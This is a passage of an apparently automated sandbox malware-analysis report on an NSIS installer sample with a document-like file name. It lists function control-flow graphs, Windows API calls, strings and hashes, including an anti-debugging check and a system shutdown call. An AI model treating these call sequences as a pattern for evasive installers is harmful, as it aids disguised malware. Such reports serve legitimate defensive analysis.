40364b-403656 ExitWindowsEx 196->224 199 403669 197->199 200 40366d-403671 ExitProcess 197->200 198->194 206 403489-40348c 198->206 199->200 201->179 214 4034a9-4034bf call 405ce0 * 2 201->214 202->179 208 40351a-40352f CreateDirectoryA SetCurrentDirectoryA 202->208 206->194 206->198 211 403531-403537 call 405ce0 208->211 212 40353c-403564 call 405ce0 208->212 211->212 222 40356a-403586 call 405d02 DeleteFileA 212->222 214->183 232 4035c7-4035ce 222->232 233 403588-403598 CopyFileA 222->233 223->224 227 403607-403609 223->227 224->197 229 403658-40365a call 40140b 224->229 227->224 234 40360b-40361d GetCurrentProcess 227->234 229->197 232->222 236 4035d0-4035d7 call 405b94 232->236 233->232 235 40359a-4035ba call 405b94 call 405d02 call 405493 233->235 234->224 241 40361f-403641 234->241 235->232 248 4035bc-4035c3 CloseHandle 235->248 236->179 241->224 248->232
                                                                                                              APIs
                                                                                                              • #17.COMCTL32 ref: 0040323A
                                                                                                              • SetErrorMode.KERNEL32(00008001), ref: 00403245
                                                                                                              • OleInitialize.OLE32(00000000), ref: 0040324C
                                                                                                                • Part of subcall function 0040600B: GetModuleHandleA.KERNEL32(?,?,?,0040325E,00000008), ref: 0040601D
                                                                                                                • Part of subcall function 0040600B: LoadLibraryA.KERNEL32(?,?,?,0040325E,00000008), ref: 00406028
                                                                                                                • Part of subcall function 0040600B: GetProcAddress.KERNEL32(00000000,?), ref: 00406039
                                                                                                              • SHGetFileInfoA.SHELL32(0041ECA0,00000000,?,00000160,00000000,00000008), ref: 00403274
                                                                                                                • Part of subcall function 00405CE0: lstrcpynA.KERNEL32(?,?,00000400,00403289,00422EE0,NSIS Error), ref: 00405CED
                                                                                                              • GetCommandLineA.KERNEL32(00422EE0,NSIS Error), ref: 00403289
                                                                                                              • GetModuleHandleA.KERNEL32(00000000,00429000,00000000), ref: 0040329C
                                                                                                              • CharNextA.USER32(00000000,00429000,00000020), ref: 004032C7
                                                                                                              • GetTempPathA.KERNEL32(00000400,0042A400,00000000,00000020), ref: 004033C4
                                                                                                              • GetWindowsDirectoryA.KERNEL32(0042A400,000003FB), ref: 004033D5
                                                                                                              • lstrcatA.KERNEL32(0042A400,\Temp), ref: 004033E1
                                                                                                              • GetTempPathA.KERNEL32(000003FC,0042A400,0042A400,\Temp), ref: 004033F5
                                                                                                              • lstrcatA.KERNEL32(0042A400,Low), ref: 004033FD
                                                                                                              • SetEnvironmentVariableA.KERNEL32(TEMP,0042A400,0042A400,Low), ref: 0040340E
                                                                                                              • SetEnvironmentVariableA.KERNEL32(TMP,0042A400), ref: 00403416
                                                                                                              • DeleteFileA.KERNEL32(0042A000), ref: 0040342A
                                                                                                              • OleUninitialize.OLE32(?), ref: 004034D8
                                                                                                              • ExitProcess.KERNEL32 ref: 004034F8
                                                                                                              • lstrcatA.KERNEL32(0042A400,~nsu.tmp,00429000,00000000,?), ref: 00403504
                                                                                                              • lstrcmpiA.KERNEL32(0042A400,00429C00), ref: 00403510
                                                                                                              • CreateDirectoryA.KERNEL32(0042A400,00000000), ref: 0040351C
                                                                                                              • SetCurrentDirectoryA.KERNEL32(0042A400), ref: 00403523
                                                                                                              • DeleteFileA.KERNEL32(0041E8A0,0041E8A0,?,00424000,?), ref: 0040357C
                                                                                                              • CopyFileA.KERNEL32(0042AC00,0041E8A0,?), ref: 00403590
                                                                                                              • CloseHandle.KERNEL32(00000000,0041E8A0,0041E8A0,?,0041E8A0,00000000), ref: 004035BD
                                                                                                              • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 00403612
                                                                                                              • ExitWindowsEx.USER32(00000002,00000000), ref: 0040364E
                                                                                                              • ExitProcess.KERNEL32 ref: 00403671
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                                                                              • String ID: "$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                                                                              • API String ID: 4107622049-2472465286
                                                                                                              • Opcode ID: f1c2d51b410b7d3f0de0b26a2197df22ab01be371bdb435f61116c8a1d7ecd3b
                                                                                                              • Instruction ID: 7fa91be0df980d7df711fed2a4ed052ffc20252d69ef6f5c306a31a697f91405
                                                                                                              • Opcode Fuzzy Hash: f1c2d51b410b7d3f0de0b26a2197df22ab01be371bdb435f61116c8a1d7ecd3b
                                                                                                              • Instruction Fuzzy Hash: C5B117706083516EE7216F659D4DA2B3EACAB45306F44447FF4817A2E2C77C9E01CB6E
                                                                                                              Function 00404948 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 249 404948-404994 GetDlgItem * 2 250 404bb4-404bbb 249->250 251 40499a-404a2e GlobalAlloc LoadBitmapA SetWindowLongA ImageList_Create ImageList_AddMasked SendMessageA * 2 249->251 252 404bbd-404bcd 250->252 253 404bcf 250->253 254 404a30-404a3b SendMessageA 251->254 255 404a3d-404a44 DeleteObject 251->255 256 404bd2-404bdb 252->256 253->256 254->255 257 404a46-404a4e 255->257 258 404be6-404bec 256->258 259 404bdd-404be0 256->259 260 404a50-404a53 257->260 261 404a77-404a7b 257->261 265 404bfb-404c02 258->265 266 404bee-404bf5 258->266 259->258 262 404cca-404cd1 259->262 263 404a55 260->263 264 404a58-404a75 call 405d02 SendMessageA * 2 260->264 261->257 267 404a7d-404aa9 call 403fce * 2 261->267 272 404d42-404d4a 262->272 273 404cd3-404cd9 262->273 263->264 264->261 269 404c04-404c07 265->269 270 404c77-404c7a 265->270 266->262 266->265 308 404b73-404b86 GetWindowLongA SetWindowLongA 267->308 309 404aaf-404ab5 267->309 278 404c12-404c27 call 404896 269->278 279 404c09-404c10 269->279 270->262 274 404c7c-404c86 270->274 276 404d54-404d5b 272->276 277 404d4c-404d52 SendMessageA 272->277 281 404f2a-404f3c call 404035 273->281 282 404cdf-404ce9 273->282 284 404c96-404ca0 274->284 285 404c88-404c94 SendMessageA 274->285 286 404d5d-404d64 276->286 287 404d8f-404d96 276->287 277->276 278->270 307 404c29-404c3a 278->307 279->270 279->278 282->281 290 404cef-404cfe SendMessageA 282->290 284->262 292 404ca2-404cac 284->292 285->284 293 404d66-404d67 ImageList_Destroy 286->293 294 404d6d-404d74 286->294 297 404eec-404ef3 287->297 298 404d9c-404da8 call 4011ef 287->298 290->281 299 404d04-404d15 SendMessageA 290->299 303 404cbd-404cc7 292->303 304 404cae-404cbb 292->304 293->294 305 404d76-404d77 GlobalFree 294->305 306 404d7d-404d89 294->306 297->281 302 404ef5-404efc 297->302 317 404db8-404dbb 298->317 318 404daa-404dad 298->318 300 404d17-404d1d 299->300 301 404d1f-404d21 299->301 300->301 312 404d22-404d3b call 401299 SendMessageA 300->312 301->312 302->281 313 404efe-404f28 ShowWindow GetDlgItem ShowWindow 302->313 303->262 304->262 305->306 306->287 307->270 315 404c3c-404c3e 307->315 314 404b8c-404b90 308->314 316 404ab8-404abe 309->316 312->272 313->281 320 404b92-404ba5 ShowWindow call 404003 314->320 321 404baa-404bb2 call 404003 314->321 322 404c40-404c47 315->322 323 404c51 315->323 324 404b54-404b67 316->324 325 404ac4-404aec 316->325 333 404dfc-404e20 call 4011ef 317->333 334 404dbd-404dd6 call 4012e2 call 401299 317->334 329 404db0-404db3 call 404916 318->329 330 404daf 318->330 320->281 321->250 337 404c49-404c4b 322->337 338 404c4d-404c4f 322->338 328 404c54-404c70 call 40117d 323->328 324->316 332 404b6d-404b71 324->332 326 404b26-404b28 325->326 327 404aee-404b24 SendMessageA 325->327 340 404b2a-404b39 SendMessageA 326->340 341 404b3b-404b51 SendMessageA 326->341 327->324 328->270 329->317 330->329 332->308 332->314 350 404ec2-404ed6 InvalidateRect 333->350 351 404e26 333->351 359 404de6-404df5 SendMessageA 334->359 360 404dd8-404dde 334->360 337->328 338->328 340->324 341->324 350->297 355 404ed8-404ee7 call 404869 call 4047b4 350->355 353 404e29-404e34 351->353 356 404e36-404e45 353->356 357 404eaa-404ebc 353->357 355->297 361 404e47-404e54 356->361 362 404e58-404e5b 356->362 357->350 357->353 359->333 363 404de0 360->363 364 404de1-404de4 360->364 361->362 366 404e62-404e6b 362->366 367 404e5d-404e60 362->367 363->364 364->359 364->360 369 404e70-404ea8 SendMessageA * 2 366->369 370 404e6d 366->370 367->369 369->357 370->369
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,000003F9), ref: 00404960
                                                                                                              • GetDlgItem.USER32(?,00000408), ref: 0040496B
                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 004049B5
                                                                                                              • LoadBitmapA.USER32(0000006E), ref: 004049C8
                                                                                                              • SetWindowLongA.USER32(?,000000FC,00404F3F), ref: 004049E1
                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004049F5
                                                                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404A07
                                                                                                              • SendMessageA.USER32(?,00001109,00000002), ref: 00404A1D
                                                                                                              • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404A29
                                                                                                              • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404A3B
                                                                                                              • DeleteObject.GDI32(00000000), ref: 00404A3E
                                                                                                              • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404A69
                                                                                                              • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404A75
                                                                                                              • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B0A
                                                                                                              • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404B35
                                                                                                              • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B49
                                                                                                              • GetWindowLongA.USER32(?,000000F0), ref: 00404B78
                                                                                                              • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404B86
                                                                                                              • ShowWindow.USER32(?,00000005), ref: 00404B97
                                                                                                              • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404C94
                                                                                                              • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404CF9
                                                                                                              • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404D0E
                                                                                                              • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404D32
                                                                                                              • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404D52
                                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 00404D67
                                                                                                              • GlobalFree.KERNEL32(?), ref: 00404D77
                                                                                                              • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404DF0
                                                                                                              • SendMessageA.USER32(?,00001102,?,?), ref: 00404E99
                                                                                                              • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404EA8
                                                                                                              • InvalidateRect.USER32(?,00000000,?), ref: 00404EC8
                                                                                                              • ShowWindow.USER32(?,00000000), ref: 00404F16
                                                                                                              • GetDlgItem.USER32(?,000003FE), ref: 00404F21
                                                                                                              • ShowWindow.USER32(00000000), ref: 00404F28
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                              • String ID: $M$N
                                                                                                              • API String ID: 1638840714-813528018
                                                                                                              • Opcode ID: 6019a7d24dc9c87425b38522d15bedd37beed45e32c0b1a79d6095b94ecd9dc9
                                                                                                              • Instruction ID: f2143584ce3f00a3ae0df77e4ff30717a481f0723155f1d06c12757e5ebf3bcb
                                                                                                              • Opcode Fuzzy Hash: 6019a7d24dc9c87425b38522d15bedd37beed45e32c0b1a79d6095b94ecd9dc9
                                                                                                              • Instruction Fuzzy Hash: E9026FB0900209AFEB10DF54DD85AAE7BB5FB84315F10817AF610BA2E1D7789E42DF58
                                                                                                              Function 004055A0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 159filestringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • DeleteFileA.KERNEL32(?,?,0042A400,771B2EE0,00000000), ref: 004055C9
                                                                                                              • lstrcatA.KERNEL32(00420CE8,\*.*,00420CE8,?,?,0042A400,771B2EE0,00000000), ref: 00405611
                                                                                                              • lstrcatA.KERNEL32(?,00409014,?,00420CE8,?,?,0042A400,771B2EE0,00000000), ref: 00405632
                                                                                                              • lstrlenA.KERNEL32(?,?,00409014,?,00420CE8,?,?,0042A400,771B2EE0,00000000), ref: 00405638
                                                                                                              • FindFirstFileA.KERNEL32(00420CE8,?,?,?,00409014,?,00420CE8,?,?,0042A400,771B2EE0,00000000), ref: 00405649
                                                                                                              • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004056F6
                                                                                                              • FindClose.KERNEL32(00000000), ref: 00405707
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                              • String ID: \*.*
                                                                                                              • API String ID: 2035342205-1173974218
                                                                                                              • Opcode ID: ef56282ed887487ddcd5f02f6b3637e78b82bf58436e7ecfd59df446aa7fef5a
                                                                                                              • Instruction ID: be8413790da27f3485791dfb71ea9e97d61aa92783f5c3743ff415ab50f27cdc
                                                                                                              • Opcode Fuzzy Hash: ef56282ed887487ddcd5f02f6b3637e78b82bf58436e7ecfd59df446aa7fef5a
                                                                                                              • Instruction Fuzzy Hash: 6851DE70904A04BAEB217A258D45BAF7AB8DF42714F54453BF404762D2C73C4D82EEAE
                                                                                                              Function 004062BA Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: eadc838c817926bcbe80dad00e1adb541f194e0ade0e3c9be9dd58be48476283
                                                                                                              • Instruction ID: 1e8d97365fb74901917855b8d794782cfd73437813f55072e0905c4e61bb52af
                                                                                                              • Opcode Fuzzy Hash: eadc838c817926bcbe80dad00e1adb541f194e0ade0e3c9be9dd58be48476283
                                                                                                              • Instruction Fuzzy Hash: 41F16771D00229CBCF28CFA8C8946ADBBB1FF45305F25816ED856BB281D7785A96CF44
                                                                                                              Function 333E60E2 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 333E61DA
                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 333E61E4
                                                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 333E61F1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                              • String ID:
                                                                                                              • API String ID: 3906539128-0
                                                                                                              • Opcode ID: 694d312f13123a3aff48ce1a3a6788338dfd649536dcef215a0a54c5de3bbdb9
                                                                                                              • Instruction ID: 84ce907bf51b283665300b6c0f0f18f2c095b9d0b838eabd2b2412d229e0c463
                                                                                                              • Opcode Fuzzy Hash: 694d312f13123a3aff48ce1a3a6788338dfd649536dcef215a0a54c5de3bbdb9
                                                                                                              • Instruction Fuzzy Hash: 7931B375D4122C9BCB61DF64D98879DBBB8AF08310F5081DAE81CA7250E7749F858F45
                                                                                                              Function 333E4AB4 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetCurrentProcess.KERNEL32(?,?,333E4A8A,?,333F2238,0000000C,333E4BBD,00000000,00000000,?,333E2082,333F2108,0000000C,333E1F3A,?), ref: 333E4AD5
                                                                                                              • TerminateProcess.KERNEL32(00000000,?,333E4A8A,?,333F2238,0000000C,333E4BBD,00000000,00000000,?,333E2082,333F2108,0000000C,333E1F3A,?), ref: 333E4ADC
                                                                                                              • ExitProcess.KERNEL32 ref: 333E4AEE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                              • String ID:
                                                                                                              • API String ID: 1703294689-0
                                                                                                              • Opcode ID: 8ce4675ca6d22ab8a7264e3547f75f642dc82764cfa9951abc51175021cefaa6
                                                                                                              • Instruction ID: f6610b8f24597bdf81bc60bb8347fd61d41bede8c8c7f928f02088f7aa5ddbd0
                                                                                                              • Opcode Fuzzy Hash: 8ce4675ca6d22ab8a7264e3547f75f642dc82764cfa9951abc51175021cefaa6
                                                                                                              • Instruction Fuzzy Hash: 8AE04637810228AFCF11BF24CD48A593BAEEF05392B04C010F9159B821DB39EC83CB44
                                                                                                              Function 333E724E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HeapProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 54951025-0
                                                                                                              • Opcode ID: 0c3191ee4d5f56cc4785772c898c3afc6eb20a089e996048fcb7e25e812f55ba
                                                                                                              • Instruction ID: a39f76672f38a556eacad0849c2acd1780b4cc47efb2bd842c4fb65e203982a8
                                                                                                              • Opcode Fuzzy Hash: 0c3191ee4d5f56cc4785772c898c3afc6eb20a089e996048fcb7e25e812f55ba
                                                                                                              • Instruction Fuzzy Hash: 9AA011302022028F8320AE30CA0A20C3AECAA022A23088228A808E8000EB28C8028B02
                                                                                                              Function 00405109 Relevance: 54.3, APIs: 36, Instructions: 280windowclipboardmemoryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 371 405109-405125 372 4052b6-4052bc 371->372 373 40512b-4051f4 GetDlgItem * 3 call 404003 call 404869 GetClientRect GetSystemMetrics SendMessageA * 2 371->373 375 4052e6-4052f2 372->375 376 4052be-4052e0 GetDlgItem CreateThread CloseHandle 372->376 391 405212-405215 373->391 392 4051f6-405210 SendMessageA * 2 373->392 378 405314-40531a 375->378 379 4052f4-4052fa 375->379 376->375 383 40531c-405322 378->383 384 40536f-405372 378->384 381 405335-40533c call 404035 379->381 382 4052fc-40530f ShowWindow * 2 call 404003 379->382 395 405341-405345 381->395 382->378 388 405324-405330 call 403fa7 383->388 389 405348-405358 ShowWindow 383->389 384->381 386 405374-40537a 384->386 386->381 393 40537c-40538f SendMessageA 386->393 388->381 396 405368-40536a call 403fa7 389->396 397 40535a-405363 call 404fcb 389->397 400 405225-40523c call 403fce 391->400 401 405217-405223 SendMessageA 391->401 392->391 402 405395-4053c1 CreatePopupMenu call 405d02 AppendMenuA 393->402 403 40548c-40548e 393->403 396->384 397->396 410 405272-405293 GetDlgItem SendMessageA 400->410 411 40523e-405252 ShowWindow 400->411 401->400 408 4053c3-4053d3 GetWindowRect 402->408 409 4053d6-4053ec TrackPopupMenu 402->409 403->395 408->409 409->403 413 4053f2-40540c 409->413 410->403 412 405299-4052b1 SendMessageA * 2 410->412 414 405261 411->414 415 405254-40525f ShowWindow 411->415 412->403 416 405411-40542c SendMessageA 413->416 417 405267-40526d call 404003 414->417 415->417 416->416 418 40542e-40544e OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 416->418 417->410 420 405450-405470 SendMessageA 418->420 420->420 421 405472-405486 GlobalUnlock SetClipboardData CloseClipboard 420->421 421->403
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,00000403), ref: 00405169
                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 00405178
                                                                                                              • GetClientRect.USER32(?,?), ref: 004051B5
                                                                                                              • GetSystemMetrics.USER32(00000015), ref: 004051BD
                                                                                                              • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 004051DE
                                                                                                              • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004051EF
                                                                                                              • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405202
                                                                                                              • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405210
                                                                                                              • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405223
                                                                                                              • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405245
                                                                                                              • ShowWindow.USER32(?,00000008), ref: 00405259
                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 0040527A
                                                                                                              • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040528A
                                                                                                              • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004052A3
                                                                                                              • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004052AF
                                                                                                              • GetDlgItem.USER32(?,000003F8), ref: 00405187
                                                                                                                • Part of subcall function 00404003: SendMessageA.USER32(00000028,?,?,00403E34), ref: 00404011
                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004052CB
                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_0000509D,00000000), ref: 004052D9
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004052E0
                                                                                                              • ShowWindow.USER32(00000000), ref: 00405303
                                                                                                              • ShowWindow.USER32(?,00000008), ref: 0040530A
                                                                                                              • ShowWindow.USER32(00000008), ref: 00405350
                                                                                                              • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405384
                                                                                                              • CreatePopupMenu.USER32 ref: 00405395
                                                                                                              • AppendMenuA.USER32(00000000,00000000,?,00000000), ref: 004053AA
                                                                                                              • GetWindowRect.USER32(?,000000FF), ref: 004053CA
                                                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053E3
                                                                                                              • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040541F
                                                                                                              • OpenClipboard.USER32(00000000), ref: 0040542F
                                                                                                              • EmptyClipboard.USER32 ref: 00405435
                                                                                                              • GlobalAlloc.KERNEL32(00000042,?), ref: 0040543E
                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00405448
                                                                                                              • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040545C
                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405475
                                                                                                              • SetClipboardData.USER32(?,00000000), ref: 00405480
                                                                                                              • CloseClipboard.USER32 ref: 00405486
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                              • String ID:
                                                                                                              • API String ID: 590372296-0
                                                                                                              • Opcode ID: 56b7aaf2c892c255f7557c50d91ec83cd0e9f82adcc69e5958c84cdd5952280e
                                                                                                              • Instruction ID: 6e0b0f1ca08e2e29469adbd3a377171c3ef53385c96749dd380b411ab2712325
                                                                                                              • Opcode Fuzzy Hash: 56b7aaf2c892c255f7557c50d91ec83cd0e9f82adcc69e5958c84cdd5952280e
                                                                                                              • Instruction Fuzzy Hash: CBA16971900209BFDB21AFA0DD89AAE7F79FB04345F00407AFA05B61A0C7B55E41DF69
                                                                                                              Function 00403AFB Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
